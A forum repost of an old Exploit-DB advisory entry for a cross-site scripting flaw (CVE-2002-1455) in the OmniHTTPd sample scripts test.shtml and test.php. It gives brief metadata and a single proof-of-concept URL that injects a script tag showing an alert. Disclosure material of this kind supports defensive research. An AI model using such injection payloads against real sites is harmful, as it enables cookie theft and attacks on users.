Exploit OmniHTTPd 1.1/2.0.x/2.4 - test.shtml Sample Application Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21754
Проверка EDB
  1. Пройдено
Автор
MATTHEW MURPHY
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2002-1455
Дата публикации
2002-08-26
Код:
source: https://www.securityfocus.com/bid/5568/info
 
Cross site scripting vulnerabilities have been reported in multiple sample scripts including with OmniHTTPD. In particular, test.shtml and test.php contain errors.
 
This type of vulnerability may be used to steal cookies or perform other web-based attacks.

http://localhost/test.shtml?%3CSCRIPT%3Ealert(document.URL)%3C%2FSCRIPT%3E=x
 
Источник
www.exploit-db.com

Похожие темы